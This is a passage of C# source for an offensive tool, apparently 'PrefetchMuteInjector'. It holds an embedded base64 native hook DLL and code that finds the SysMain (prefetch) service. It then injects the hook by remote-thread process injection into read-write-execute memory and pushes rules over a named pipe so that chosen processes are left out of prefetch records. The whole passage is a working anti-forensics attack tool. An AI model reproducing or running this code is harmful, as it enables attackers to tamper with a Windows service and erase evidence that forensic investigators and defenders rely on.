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AACCRAAAAAAAAAAAAAAAAAAAnEUAAAAAAAC2RAAAAAAAAMJEAAAAAAAAAAAAAAAAAACQRAAAAAAAAFJFAAAAAAAAzEQAAAAAAACORQAAAAAAAIJFAAAAAAAAeEUAAAAAAABqRQAAAAAAAN5EAAAAAAAANkUAAAAAAAAaRQAAAAAAAPhEAAAAAAAAAAAAAAAAAABMRAAAAAAAAGhEAAAAAAAAAAAAAAAAAABCRAAAAAAAAJRHAAAAAAAAAAAAAAAAAAB3BFJlYWRGaWxlAADbBVZpcnR1YWxQcm90ZWN0AADbAENyZWF0ZU5hbWVkUGlwZUEAAB0CR2V0Q3VycmVudFByb2Nlc3MAGwRPdXRwdXREZWJ1Z1N0cmluZ0EAACYBRGlzY29ubmVjdE5hbWVkUGlwZQCGAENsb3NlSGFuZGxlAKMDSzMyR2V0TW9kdWxlQmFzZU5hbWVBAPIAQ3JlYXRlVGhyZWFkAABOA0hlYXBBbGxvYwC7AkdldFByb2Nlc3NIZWFwAACaA0szMkVudW1Qcm9jZXNzTW9kdWxlcwCcAENvbm5lY3ROYW1lZFBpcGUAAEtFUk5FTDMyLmRsbAAAjwI/X1hvdXRfb2ZfcmFuZ2VAc3RkQEBZQVhQRUJEQFoAAI4CP19YbGVuZ3RoX2Vycm9yQHN0ZEBAWUFYUEVCREBaAABNU1ZDUDE0MC5kbGwAAAAAX19DeHhGcmFtZUhhbmRsZXI0AAAiAF9fc3RkX2V4Y2VwdGlvbl9kZXN0cm95ACEAX19zdGRfZXhjZXB0aW9uX2NvcHkAAEIAc3Ryc3RyAAAIAF9fQ19zcGVjaWZpY19oYW5kbGVyAAABAF9DeHhUaHJvd0V4Y2VwdGlvbgAAPgBtZW1zZXQAACUAX19zdGRfdHlwZV9pbmZvX2Rlc3Ryb3lfbGlzdAAAVkNSVU5USU1FMTQwXzEuZGxsAABWQ1JVTlRJTUUxNDAuZGxsAACYAHRvdXBwZXIADwBfX3N0ZGlvX2NvbW1vbl92c3ByaW50Zl9zAA0AX19zdGRpb19jb21tb25fdnNwcmludGYAcgB3Y3N0b21ic19zAAA5AF9pbnZhbGlkX3BhcmFtZXRlcl9ub2luZm9fbm9yZXR1cm4AAAgAX2NhbGxuZXdoABkAbWFsbG9jAAA/AF9zZWhfZmlsdGVyX2RsbAAYAF9jb25maWd1cmVfbmFycm93X2FyZ3YAADMAX2luaXRpYWxpemVfbmFycm93X2Vudmlyb25tZW50AAA0AF9pbml0aWFsaXplX29uZXhpdF90YWJsZQAAPABfcmVnaXN0ZXJfb25leGl0X2Z1bmN0aW9uACIAX2V4ZWN1dGVfb25leGl0X3RhYmxlAB4AX2NydF9hdGV4aXQAFgBfY2V4aXQAADYAX2luaXR0ZXJtADcAX2luaXR0ZXJtX2UAGABmcmVlAABhcGktbXMtd2luLWNydC1zdHJpbmctbDEtMS0wLmRsbAAAYXBpLW1zLXdpbi1jcnQtc3RkaW8tbDEtMS0wLmRsbABhcGktbXMtd2luLWNydC1jb252ZXJ0LWwxLTEtMC5kbGwAYXBpLW1zLXdpbi1jcnQtcnVudGltZS1sMS0xLTAuZGxsAGFwaS1tcy13aW4tY3J0LWhlYXAtbDEtMS0wLmRsbAAA0wRSdGxDYXB0dXJlQ29udGV4dADaBFJ0bExvb2t1cEZ1bmN0aW9uRW50cnkAAOEEUnRsVmlydHVhbFVud2luZAAAvAVVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAHsFU2V0VW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAJoFVGVybWluYXRlUHJvY2VzcwAAiQNJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AIIDSXNEZWJ1Z2dlclByZXNlbnQAUARRdWVyeVBlcmZvcm1hbmNlQ291bnRlcgAeAkdldEN1cnJlbnRQcm9jZXNzSWQAIgJHZXRDdXJyZW50VGhyZWFkSWQAAPACR2V0U3lzdGVtVGltZUFzRmlsZVRpbWUAbANJbml0aWFsaXplU0xpc3RIZWFkADsAbWVtY21wAAA9AG1lbW1vdmUAhgBzdHJjbXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAADNXSDSZtT//zKi3y2ZKwAAAQAAAAIAAAAvIAAAAAAAAAD4AAAAAAAAAQAAAAAAAAAAAAAAAAAAAJgyAIABAAAAAAAAAAAAAAAuP0FWdHlwZV9pbmZvQEAAmDIAgAEA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";




        static int FindSysmainSvc()
        {
            Process[] proclist = Process.GetProcesses();

            foreach (Process proc in proclist)
            {
                try
                {
                    foreach (ProcessModule module in proc.Modules)
                    {
                        if (module.ToString().Contains("sysmain.dll"))
                        {
                            return proc.Id;
                        }
                    }
                }
                catch { }
            }

            return -1;
        }

        static bool InjectHook(int pid)
        {
            IntPtr hThread;
            IntPtr hProcess;
            IntPtr lpBuffer;
            bool bWriteSuccess;
            UIntPtr dwBytesWritten;

            byte[] lpDecodedHook = System.Convert.FromBase64String(PrefetchHook);

            hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
            if (hProcess == null)
            {
                Console.WriteLine("[!] OpenProcess(): FAILED");
                return false;
            }

            lpBuffer = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)lpDecodedHook.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (lpBuffer == null)
            {
                Console.WriteLine("[!] VirtualAllocEx(): FAILED");
                return false;
            }

            bWriteSuccess = WriteProcessMemory(hProcess, lpBuffer, lpDecodedHook, (uint)lpDecodedHook.Length, out dwBytesWritten);
            if (bWriteSuccess == false)
            {
                Console.WriteLine("[!] WriteProcessMemory(): FAILED");
                return false;
            }

            hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, lpBuffer, IntPtr.Zero, 0, IntPtr.Zero);
            if (hThread == null)
            {
                Console.WriteLine("[!] CreateRemoteThread(): FAILED");
                return false;
            }

            CloseHandle(hProcess);

            return true;
        }

        static void ShowHelp(OptionSet p)
        {
            Console.WriteLine("Usage: prefetchmute [-p/--Pid] [-i/--Inject] [-e/--Encoded] [-f/--Filter]");
            Console.WriteLine("Options:");
            p.WriteOptionDescriptions(Console.Out);
        }

        static bool UpdateFilterRule(string Rule)
        {

            var SysmainSvcPipe = new NamedPipeClientStream(".", "prefetch_rule_pipe", PipeDirection.Out, PipeOptions.None, System.Security.Principal.TokenImpersonationLevel.Impersonation);

            try
            {
                SysmainSvcPipe.Connect(5000);
            }
            catch (TimeoutException)
            {
                Console.WriteLine("[!] Connection timed out. Have you injected the hook?");
                return false;
            }

            SysmainSvcPipe.Write(System.Text.Encoding.ASCII.GetBytes(Rule), 0, System.Text.Encoding.ASCII.GetBytes(Rule).Length);
            SysmainSvcPipe.Dispose();

            Console.WriteLine("[+] Item added to filter list");

            return true;
        }

        static void Main(string[] args)
        {
            int pid = 0;
            List<string> extra;
            string NewRule = null;
            bool bDoHooking = false;
            bool bOnlyFindPid = false;

            Console.WriteLine("PrefetchMuteInjector");
            Console.WriteLine("@passthehashbrwn");
            Console.WriteLine("Many thanks to @_bats3c_ for EvtMute\n");

            var p = new OptionSet()
            {
                { "p|Pid", "Find the PID of the event service.", v => { bOnlyFindPid = true; } },
                { "i|Inject", "Inject the hook into the event service", v => { bDoHooking = true; bOnlyFindPid = true; } },
                { "f|Filter=", "Process to add to block list", v => { NewRule = v; } },
            };

            try
            {
                extra = p.Parse(args);
            }
            catch (OptionException e)
            {
                Console.WriteLine(e.Message);
                return;
            }

            if (args.Length == 0)
            {
                ShowHelp(p);
                return;
            }

            if (bOnlyFindPid == true)
            {
                pid = FindSysmainSvc();
                if (pid == -1)
                {
                    Console.WriteLine("[!] Failed to find sysmain.dll, you got the correct privs?");
                    return;
                }

                Console.WriteLine("[i] Found PID: {0}", pid);
            }

            if (bDoHooking == true)
            {
                bool bSuccess = InjectHook(pid);
                if (bSuccess == true)
                {
                    Console.WriteLine("[+] Injected hook");
                }
                else
                {
                    Console.WriteLine("[!] Failed to inject hook, check your privs");
                }
            }

            if (NewRule != null)
            {
                UpdateFilterRule(NewRule);
            }
        }
    }
}

